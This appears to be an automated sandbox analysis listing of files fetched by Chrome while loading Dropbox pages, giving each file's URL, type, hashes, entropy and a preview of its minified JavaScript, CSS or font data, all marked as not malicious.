                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-icons_assets_ui-icon_external-logo_twitter-vflnOUkLk.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="a61e4caa-caac-3d46-82fb-7c96369f8759")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function c(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(c){if("default"!==c){var r=Object.getOwnPropertyDescriptor(e,c);Object.defineProperty(t,c,r.get?r:{enumerable:!0,get:function(){return e[c]}})}})),t.default=e,Object.freeze(t)}var r=c(t);e.InstagramExternalLogo=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{d:"M12 5.443c2.136 0 2.389.008 3.233.046.78.036 1.203.166 1.485.276.348.128.663.332.921.598.266.259.47.573.599.921.11.282.24.706.275 1.486.039.844.047 1.096.047 3.232 0 2.137-.008 2.39-.047 3.233-.035.78-.166 1.204-.275 1.486a2.653 2.653 0 0 1-1.518 1.518c-.282.11-.706.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65263)
                                                                        Category:dropped
                                                                        Size (bytes):3285460
                                                                        Entropy (8bit):5.587343837748764
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3EE54D71C49CB38728CA4F00EDE98B7B
                                                                        SHA1:4D7CD657B1A08D769543B6FDE174EC44897594C2
                                                                        SHA-256:D40AC1B87AF9AF62A7A1E2E1D082A912F710460437125AFFA285DCAA120BE6FB
                                                                        SHA-512:0EF3E356EE681E6558CC79376203E0F8F01E43CBBB81CDD0A4EA3BC03BD90549B1E5A2E036B73F7B1942BDA238BEECB0962D34BA91D3EF22D343142434F23A4B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="112d3232-513b-3630-b8ff-dbbcde6b9f71")}catch(e){}}();.define(["module","require","exports","react","./c_core_i18n","./e_edison","./c_api_v2_routes_user_metadata_provider","./c_init_data_edison","./e_data_modules_stormcrow","./e_core_exception","./c_hive_schemas_sharing-request_access_user_events","./c_core_notify","./c_pap-events_sign_save_signature_doc","./c_src_sink_index","./c_plugin_utils_getImageDefaultSizes","./c_performance_metrics_route_name_resolver","./c_api_v2_noauth_client","./c_memoize-one","metaserver/static/js/modules/constants/viewer","react-dom","./c_lodash","./c_security_csrf_hmac","metaserver/static/js/langpack"],(function(e,t,n,i,a,r,o,s,l,c,d,u,_,m,p,f,g,h,E,v,S,b,y){"use strict";function T(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&O
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (5519)
                                                                        Category:downloaded
                                                                        Size (bytes):5897
                                                                        Entropy (8bit):5.376636015447952
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:7E117EA295FF681D69623A25F7F56630
                                                                        SHA1:9E2B78B5B56DD1E8095A0BE1CD17234AECEFADA3
                                                                        SHA-256:F4A5CEA85140FBB29AB3FBB26514656694B95CEA1A398E284A5C1EFB46F699EB
                                                                        SHA-512:6B2AD64A9A43C9DC3FF192D46C343AE7F41C235E4363C2520D7CD4F3297CE5487243550429D655FAC01BC55E10AD562D778D4ECC7814F392793D8B2E1362D23C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_abuse_funcaptcha_modal-vflfhF-op.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ccac9ea7-641c-3db1-8f6c-288a2df25a9e")}catch(e){}}();.define(["exports","react","./e_file_viewer_static_scl_page_file","./c_flux_store_listener","./c_plugin_utils_getImageDefaultSizes","./c_hive_schemas_sharing-request_access_user_events","react-dom","./c_src_sink_index","./e_core_exception","./e_data_modules_stormcrow","./c_core_i18n","./c_api_v2_routes_user_metadata_provider","metaserver/static/js/langpack","./c_lodash","./e_edison","./c_pap-events_sign_save_signature_doc","./c_init_data_edison","./c_core_notify","./c_performance_metrics_route_name_resolver","./c_memoize-one","./c_api_v2_noauth_client","metaserver/static/js/modules/constants/viewer","./c_security_csrf_hmac"],(function(e,t,s,a,n,c,i,o,r,u,d,l,p,_,h,m,f,g,C,v,A,y,w){"use strict";function F(e){return e&&e.__esMod
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), CFF, length 64312, version 1.3801
                                                                        Category:downloaded
                                                                        Size (bytes):64312
                                                                        Entropy (8bit):7.997085385162933
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:39746FA9261B312CCCBDC84FA3868586
                                                                        SHA1:86DCF95798DB4F095A2DBA3905394EECE26C2BA6
                                                                        SHA-256:FE2B97EC6926B7B6FF62113D76B0DBDF3AE10EA8F2F7A779803B6ABC8B3E1F03
                                                                        SHA-512:8D5B9CDFB0D54AD0E1024C29900BF94BE70285997F10CBF97BB5022D1F1C3559659DFDCCC332D288835B8C9F1CD22607C4F99C18580305BB6F4DEDD396600418
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/fonts/SourceCodePro-It-1058.otf.woff2
                                                                        Preview:wOF2OTTO...8.......\.............................F...q.....~..>.`....6.$..p...... [l....Cv}..,M..Q....!.(.....{R".v.;|...2g#c..H.r......._.,bl.,.... B...g...n..8%............./`%.ik.6..6...W.SS..t8'Xn.]........p....R....-L8.d)..~...s.3.M5S.T3...{..M<_.H.....E....cFfq%.:..q[x. ""...{0..!TR.T....@DD.D.f..jV.C]..R.....D..KK.).X<H .d ..w...Vr...=..k.yXB.....x.S.'G+..x...3.M+...r...S.u....Z.`-....p..6..&.`0.#..._.dsZ...,.W..Kh?......{.....>V<.......wt..N:i)=.4J.$...(.A...Rq..%y&e..$!m0|..Y31.n..tA.....x8#.5....oy.SOr.@#...ZJ.b.{..}..... ..hV..K7..v.8#YeRLOV..W2..S.]..|..H..c.C_.V;....[.Cl.8.........4..f.1..)..ZO#..$.../.vR...I.I.......w.S..~X!:....1.=.z.wW(.V..=[.{z..%C.3I.p....d..?...%1...AIP...Y.LcF.e,@.l.\.FH.....E2l..}....j$.xE...g.w...2K..|s.y...#.7.T..]..4?.5M>..@mjB..$......k/......-:.d[Gi..N..R@.oJ.qo.bts =.8....{&.]0...D....k..BU..z[.]..b.#.O...Q$".d..H.. ".4..dB...7....'.C..A.z.o....My.....K.fE.....t.P.....>.E....eb..d.1t;.......
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1283)
                                                                        Category:dropped
                                                                        Size (bytes):1663
                                                                        Entropy (8bit):5.297503103668707
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:38194EBE6CD5A0E0B8170B8484D6836F
                                                                        SHA1:67D49083A6936518DD863BD5EC1A39EAD8F5424F
                                                                        SHA-256:6581B46B249D03550ED01DF7AE045E77B532BE11AADF7AFC71FBE70DE455BA0C
                                                                        SHA-512:FD286F6A5D7DE39E4D64DA19540CC717CF7C3FF9B52CDDEEA1A75745D20FA632F9500F3F1086949194D441F1193DF2E7A2F3E4DB778A7248FBDE3E2B0D2F04F7
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="b6cf96e5-a661-37f6-9bc5-64e5bc110dcc")}catch(e){}}();.define(["require","exports","./c_core_notify","./c_api_v2_routes_user_metadata_provider","./c_security_csrf_hmac","./c_memoize-one","react-dom","react","./e_edison","./c_pap-events_sign_save_signature_doc","./c_plugin_utils_getImageDefaultSizes","./c_lodash","./c_init_data_edison","./c_hive_schemas_sharing-request_access_user_events","./e_core_exception"],(function(e,t,s,o,i,n,r,c,a,_,u,f,d,l,m){"use strict";const y="toast";async function g(e,t){const s=await i.readHmacCookieToken(e,t);if(null==s)return null;if(s.startsWith("er:"))return[!0,s.substring(3)];if(s.startsWith("ok:"))return[!1,s.substring(3)];throw new Error("unrecognized format of message in toast cookie")}t.decodeToastCookie=g,t.showToastFromCookie=async functio
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:HTML document, ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):267
                                                                        Entropy (8bit):4.717822099205975
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:00F53700C90A2EDF60A83C7C3B959710
                                                                        SHA1:270A7C333D4BDE912992993FBDB7D2EC579E9B1B
                                                                        SHA-256:C23F75F5147BEDB59DE93A0559B52C5303702B063C8D665C27CD8F40FE329B8B
                                                                        SHA-512:4F1FF50C5F02508BDF14735AEE6E1121F81120665CF10F2288F1DF344BE79649A4D48EFEE8784618184491E8DF9ACB400280E4C219D121B4057DC42CEEE8C117
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://dropboxcaptcha.com/
                                                                        Preview:<html>. <head>. <meta charset="utf-8">. <meta content="IE=edge" http-equiv="X-UA-Compatible">. <title>DropboxCaptcha</title>. </head>.. <body style="margin: 0px">. <script type="text/javascript" src="funcaptcha.js"></script></body>.</html>.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):103976
                                                                        Entropy (8bit):4.9776459293826845
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4C1B268BFF106B6007689CCAAD17EDA8
                                                                        SHA1:DE1A0EC23902775AE6EAB6EC36C76B778CE8A3EA
                                                                        SHA-256:375EA70654F77CD05181C18B96825A27FF8E6500276A931F59183EF6CA14E2D6
                                                                        SHA-512:E2916CA2C6FFA751CDCA8AA5C23D21211768E0AFE83BC7590E2989C38F257015DF2B1B30C104450B60B651761B73A0D6A64F3B8DDAE5181094E5F321BE79DC4D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/main-vflTBsmi_.css
                                                                        Preview:body,input,textarea,select,button,.normal{font-family:"Open Sans","lucida grande","Segoe UI",arial,verdana,"lucida sans unicode",tahoma,sans-serif;font-size:13px;color:var(--dig-color__text__base, #000);font-weight:normal}.maestro body:not(.dig-Button),.maestro input:not(.dig-Button),.maestro textarea:not(.dig-Button),.maestro select:not(.dig-Button),.maestro button:not(.dig-Button),.maestro .normal:not(.dig-Button){font-family:var(--dig-type__bodyfontstack, "Atlas Grotesk Web","Atlas Grotesk",AtlasGrotesk,sans-serif)}body{background-color:var(--dig-color__background__base, #fff);min-height:100%;margin:0;padding:0}a,a *{cursor:pointer;outline:none}a{color:var(--dig-color__primary__base, #0061ff);text-decoration:none}a:focus{text-decoration:underline}a img{border:0}p,h1,h2,h3,h4,h5{margin:0 0 1em 0;line-height:1.6em}h1{font-size:18pt;font-weight:normal;margin:10px 0}h2{padding-top:3px;padding-bottom:10px;margin-bottom:4px;font-size:10pt}h3{padding:0;margin:0;font-size:10pt}h4{margin:0 0
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (4382)
                                                                        Category:downloaded
                                                                        Size (bytes):4752
                                                                        Entropy (8bit):5.218034028491879
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1590C9D90B1D8980933DF67B095A1A2D
                                                                        SHA1:B50FCD456C46EEC9B4D6B391E2EFEECA3BB9256B
                                                                        SHA-256:BA7055527E3EE42AA0BBFA2327FAAB95193612CE62A1CF72CD71CB5321AF18D1
                                                                        SHA-512:38B9884715163D895B62F9F6286D7EA0763C70093367FAF31CC219DA56E49923F60F722CEAE5AD45422B10BF15C67786390E882097761C51C4A08849BB2F5D5D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_viewer_refresh-vflFZDJ2Q.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="3ed40997-4d9b-3fe8-8f86-052e7a390af0")}catch(e){}}();.define(["require","exports","./e_file_viewer_static_scl_page_file","react","./c_api_v2_routes_user_metadata_provider","./c_hive_schemas_sharing-request_access_user_events","./e_core_exception"],(function(e,t,a,r,n,c,o){"use strict";function s(e){return e&&e.__esModule?e:{default:e}}var i=s(r);let p,u=!1;const l=()=>n.isSeleniumTest();function h(){return new Promise((async(t,r)=>{var s;window.recaptchaOnloadCallback=function(){t(window.grecaptcha)};if("ON"===(null===(s=(await a.fetchExperiment("ps_infra_load_funcaptcha")).experiment)||void 0===s?void 0:s.variant)&&u&&new Promise((function(t,a){e(["./c_abuse_funcaptcha_modal"],t,a)})).then((async({loadFuncaptchaModal:e,recordFunCaptchaLoadingStats:t})=>{const a=performance.now(
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):296
                                                                        Entropy (8bit):4.728412818207413
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:AED815511C6ECC7FCFCB8A967D0295E8
                                                                        SHA1:6D559FF3792A81612269FD4227483E666052C2D8
                                                                        SHA-256:58E7474B8B9356B93A2C872AA7DF60428A0AA4BFB4217146F383B76F494015DE
                                                                        SHA-512:DF3F3FBF4AE3C814B0B18F832581CAFCE06F0088A32576F8E49D46534C0108F116DE969A15C561AF9DEDB84683DC20A16E2DA65EE16C9491D2882AA33CEF737A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/abuse/funcaptcha_modal-vflrtgVUR.css
                                                                        Preview:.funcaptcha-modal{z-index:10000;position:fixed;top:0;left:0;width:100%;height:100%}.funcaptcha-modal--hidden-firefox{visibility:hidden;z-index:0}.funcaptcha-modal--hidden-non-firefox{display:none;z-index:0}.funcaptcha-div{margin-left:auto;margin-right:auto;height:100vh;width:100%;display:block}.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2845)
                                                                        Category:downloaded
                                                                        Size (bytes):2846
                                                                        Entropy (8bit):4.966993863852829
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0E3B3B3216D852E1ADEABC8B6E7FC27B
                                                                        SHA1:5D2CC55D2D9738CBCBDFE2CC350ABF2A3BF0EFA0
                                                                        SHA-256:5585BCC97733AF2B7DC9F697D3BA3B7D4AF58484C38117DECD68F75E8407ADFE
                                                                        SHA-512:BBB9EF7CBAF5736E5983E92C358B95AB3F573EFD363DF62F9F837ECC697681F58B50BA28E8E573A6450A4A221E8716A54DBA9B09D9B002AD973CDE78D0143AF9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/font_atlas_grotesk-vflDjs7Mh.css
                                                                        Preview:@font-face{font-family:'Atlas Grotesk Web';src:url("/static/metaserver/static/fonts/atlasgrotesk/AtlasGrotesk-Light-Web-vflKfRQb9.eot");src:url("/static/metaserver/static/fonts/atlasgrotesk/AtlasGrotesk-Light-Web-vflKfRQb9.eot?#iefix") format("embedded-opentype"),url("/static/metaserver/static/fonts/atlasgrotesk/AtlasGrotesk-Light-Web-vfl5CyyQq.woff") format("woff"),url("/static/metaserver/static/fonts/atlasgrotesk/AtlasGrotesk-Light-Web-vflVNjX5v.ttf") format("truetype"),url("/static/metaserver/static/fonts/atlasgrotesk/AtlasGrotesk-Light-Web-vfloBJpb4.svg#Atlas Grotesk Web") format("svg");font-weight:300;font-style:normal;font-stretch:normal}.AtlasGrotesk-Light-Web{font-family:'Atlas Grotesk Web';font-weight:300;font-style:normal;font-stretch:normal}@font-face{font-family:'Atlas Grotesk Web';src:url("/static/metaserver/static/fonts/atlasgrotesk/AtlasGrotesk-Regular-Web-vfl31qaPE.eot");src:url("/static/metaserver/static/fonts/atlasgrotesk/AtlasGrotesk-Regular-Web-vfl31qaPE.eot?#iefix"
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (13905)
                                                                        Category:dropped
                                                                        Size (bytes):14295
                                                                        Entropy (8bit):5.219296691344079
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D676FD202224469B8BFBFD22B88597D4
                                                                        SHA1:823A0A0DFF16798B0264F2F69232F8D38C55FF6D
                                                                        SHA-256:D93ED9D637F827D10525E2C6B50D5E6D7655BEC10AA0382BDC5F105A39A66455
                                                                        SHA-512:0FFA1B283737813EDCD03CB67C0799C16B63EB7A99F25CD0756D81B11D018662D7EB637E1144ECC02BAB469D0F6904F9C2B5AD7916636D53FB1F794D06AE0722
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="aaab5e97-0232-31b9-bc52-638984746826")}catch(e){}}();.define(["exports"],(function(e){"use strict";const t={DEBUG:!1,IDLE_TIMEOUT:200,NETWORK_TIMEOUT:6e4};class i{static format(...e){return["[ttvc]",...e,"::",performance.now()]}static debug(...e){t.DEBUG&&console.debug(...this.format(...e))}static info(...e){t.DEBUG&&console.info(...this.format(...e))}static warn(...e){t.DEBUG&&console.warn(...this.format(...e))}}class s{constructor(){this.pendingRequests=0,this.subscribers=new Set,this.didNetworkTimeOut=!1,this.next=e=>{i.debug("AjaxIdleObservable.next()",e),this.subscribers.forEach((t=>t(e)))},this.startCleanupTimeout=()=>{if(0===t.NETWORK_TIMEOUT)return;this.abortCleanupTimeout();this.cleanupTimeout=window.setTimeout((()=>{i.warn("AjaxIdleObservable","::","Timed out waiting f
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2102), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):2102
                                                                        Entropy (8bit):5.140601464364906
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:FFF8E4C34D574BE9AC43718EE5ACCD9E
                                                                        SHA1:A88F5AAC146D4726FE7A7DC60BDF6BF3236CF187
                                                                        SHA-256:851BAAFA4D75A31942B8D7F752909C9BD63873DD2B2D9E3C5B69439FC1F645A2
                                                                        SHA-512:3A19E93545B170067C53EC734DC6314A160EDE0671C2E7A6AC630B34D321D4634052637E51F5D51841D8C83F3CBCAE7ECF648A9E5C2E88C6912B714CAD7D691E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://dropboxcaptcha.com/funcaptcha.js
                                                                        Preview:!function(e){var n={};function t(o){if(n[o])return n[o].exports;var a=n[o]={i:o,l:!1,exports:{}};return e[o].call(a.exports,a,a.exports,t),a.l=!0,a.exports}t.m=e,t.c=n,t.d=function(e,n,o){t.o(e,n)||Object.defineProperty(e,n,{enumerable:!0,get:o})},t.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},t.t=function(e,n){if(1&n&&(e=t(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.__esModule)return e;var o=Object.create(null);if(t.r(o),Object.defineProperty(o,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var a in e)t.d(o,a,function(n){return e[n]}.bind(null,a));return o},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,n){return Object.prototype.hasOwnProperty.call(e,n)},t.p="",t(t.s=0)}([function(e,n,t){e.exports=t(1)},function(e,n){var t,o={};function a(e){if(/^https:\/\/dr
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2215)
                                                                        Category:downloaded
                                                                        Size (bytes):2613
                                                                        Entropy (8bit):5.376135631087385
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:295CDD13ECA86C2A741CA234ADC596F7
                                                                        SHA1:EE6086F12D97866FE485DDB2FEE0B55F172516E1
                                                                        SHA-256:865E25A41C6975035FD10EEA08FFDFFC8DDCBA39D6667C01F054B0D3EE893BDA
                                                                        SHA-512:8D5556E3DFD76AA43D76399F003BA4F1D41BAFDC0A1B7F210EE2D81774B5FADF5C2D42C8699EC593F375DAE0AC9E4204E4B2AEAE084D389CD5087A43E441F0DC
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_photo-upload-vflKVzdE-.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="174b0804-550c-3a97-9825-dbaaaad4cbfe")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function l(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(l){if("default"!==l){var n=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(t,l,n.get?n:{enumerable:!0,get:function(){return e[l]}})}})),t.default=e,Object.freeze(t)}var n=l(t);e.EncryptedLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M10 11c0-1.346.654-2 2-2s2 .654 2 2c0 1.066-.41 1.698-1.25 1.915V15h-1.5v-2.085C10.41 12.698 10 12.066 10 11Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"}),n.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"m5 7.278 7-3.36 7 3.36V11c0 6.186-6.447 8.8
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 426154
                                                                        Category:downloaded
                                                                        Size (bytes):92933
                                                                        Entropy (8bit):7.995283992394409
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:52DD65192F4B21037BABD7A02549DED4
                                                                        SHA1:77B20D4B29B2D1A9850CBBEDFF71CE7D796586D2
                                                                        SHA-256:C08885FA8E471D6D76985D17067A26D6B58CC108BA0CED56E7DE417D0BAB50FB
                                                                        SHA-512:C14DE7FEA8A9A81A29FED16280D6A005677929CEF3B3C276E797C6E4CDD9B5E5A7F8511FBC0A4B264CE9D46639BE6D072D32D50E60CFE1A1E4249C489EBA9620
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/webpack/production/paper_admin~paper_admin_off_view_only~paper_binder~paper_bundle~paper_cloud_docs~paper_dashboard~pap~d6502bc2_a05b3acadab602566484.7exCNGwELHc5SlNGVdjLisPH5b9iOhkQ5-TbIOeX5Is.js.gz
                                                                        Preview:............ms.Gv&.......vP.~.j..F..+.g.w......qWC.g...._A...B....Jj....H.$../.......7....<..TfV..pHe.....|...S..v5.......W.......O..|.7.........?...4...../....~.../.._.e.+.....~.7./...../.Z....._.....%.......__j~....|y..........h.W.h\..4...?.j%_l.......\.P/.?.......>...W..\......_..?......'.}....._}.~4.~c...K....D...........g........x.w.M...L^.v.....~.........~4y>.:y...~....~..............=........>..........&.'/L....0..8ya2nm.......F....'/L6/.[x.j_._/|.....O?.....G....G...7.&..j>?y!.}...~.-(+A.m(+C..~.....p....l..ku...r.(..eEZ....,..|.......b...J...~....R.5...Q......{>t....h....2.......|.:q...,......(l.X=..BCY.r.....~....aGW........ek`|.,|.J....CY.F..F......~........}H....,...P.<.$....t.Fts...64........wP.B.<.!El J.....T_..vO..|..N.._..{...a5...4.H...; ..=.YE4..P...l....9...P...2...P...{(+..u....,....Sj|....k.....(..~.~cz..V?(.J.a.......Eb..bh./..\.z0TH|.A..x..p1{...#.dZG2....T...G...Q.S..lh.........``.{.....c.CR...........n.R..oaD
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2319)
                                                                        Category:downloaded
                                                                        Size (bytes):2712
                                                                        Entropy (8bit):5.407441474878551
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:531DBF1A978433BCBB0093A59E3130FF
                                                                        SHA1:386834AFCE409525C247FD7A88F8B8CF06173839
                                                                        SHA-256:1F7AC5CA457C74071B4A95F982B270A928A3A75D077C3DA7F2415A4B44C27E03
                                                                        SHA-512:9E7AC025C7C08299F938CC29CEB2F2A1A9206F192A74FFCCA20DACA8C981B93013507C2BE80FA8172982E126B5110764E5F103B3B3A6F9DEF59D066EA3C32DC3
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_shuffle-vflUx2_Gp.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="8af2bdd2-c4ce-3822-b17c-a3c31385d2ff")}catch(e){}}();.define(["exports","react"],(function(e,l){"use strict";function t(e){if(e&&e.__esModule)return e;var l=Object.create(null);return e&&Object.keys(e).forEach((function(t){if("default"!==t){var n=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(l,t,n.get?n:{enumerable:!0,get:function(){return e[t]}})}})),l.default=e,Object.freeze(l)}var n=t(l);e.IndentLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M11 5.5h8V7h-8V5.5Zm8 5.5h-8v1.5h8V11Zm0 5.5H5V18h14v-1.5ZM5 11.508l1.121.996L9.234 9 6.121 5.5l-1.12.997L7.226 9 5 11.508Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"})),e.InfoFill=e=>n.createElement("svg",{viewBox:"0 0 24 24",f
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65156)
                                                                        Category:downloaded
                                                                        Size (bytes):174744
                                                                        Entropy (8bit):4.906708289768462
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5597CA99AC34740BA4045D15C20A82DD
                                                                        SHA1:DB2FE867F823BE602476345DB2FC15CE8F9CA780
                                                                        SHA-256:5EFFF05B04EFFC2E94BD430F7D46CC859F6FC6DF4B6C209F0532E34903BC8013
                                                                        SHA-512:7FF11816C09730E4B33AA93DA49B29F6326EEFE39DFD8EA7F1A9F56CD995E994C4A52ED06F5E418D56E4CD399D3925C32EB2ADE3E14F3A9E8CE3ABD125F326CA
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/foundations-components-vflVZfKma.css
                                                                        Preview:/** @generated -- This file is automatically synced from @dropbox/dig-foundations@3.4.0. DO NOT MODIFY! **/../**. This file should not be imported into your CSS or SASS files - the CSS variables will be available on the page for you to use.. DO NOT USE THIS FILE OR THE CSS VARIABLE TOKENS WITHOUT FIRST TALKING TO THE DESIGN SYSTEMS ON-CALL (SEE #design-systems ON SLACK).**/..._ekabin0_3-4-0{color-scheme:var(--dig-color-scheme,light dark)}._ekabin1_3-4-0{color-scheme:light}._ekabin2_3-4-0{color-scheme:dark}._ekabin3_3-4-0{color-scheme:normal}._ekabin4_3-4-0{-webkit-appearance:none;-moz-appearance:none;appearance:none}._ekabin5_3-4-0{-webkit-user-select:none;-moz-user-select:none;user-select:none}._ekabin6_3-4-0{list-style-type:none}._ekabin7_3-4-0{cursor:default}._ekabin8_3-4-0{cursor:pointer}._ekabin9_3-4-0{word-break:break-all}._ekabina_3-4-0{word-break:break-word}._ekabinb_3-4-0{word-break:inherit}._ekabinc_3-4-0{word-break:keep-all}._ekabind_3-4-0{white-space:normal}._ekabine_3-4-
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (400)
                                                                        Category:downloaded
                                                                        Size (bytes):74477
                                                                        Entropy (8bit):4.996160179723149
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C2FB1E82F7FDBE869652AC175C9D29B1
                                                                        SHA1:D85A910ED2E0CF38EDE6DA3285B3440D4031F66A
                                                                        SHA-256:5EE372C003E43363E596A80D8254C544A5D52A649B656F91A9E8F25B148BC306
                                                                        SHA-512:A0D96C406761189E39F2C2EF3C07D6726AC8A82F075DABF0409B418F23A32CB51AFBECDC36A090532CADC1CB4E8A6BB6D0758EC146654FA832B247BFB210601F
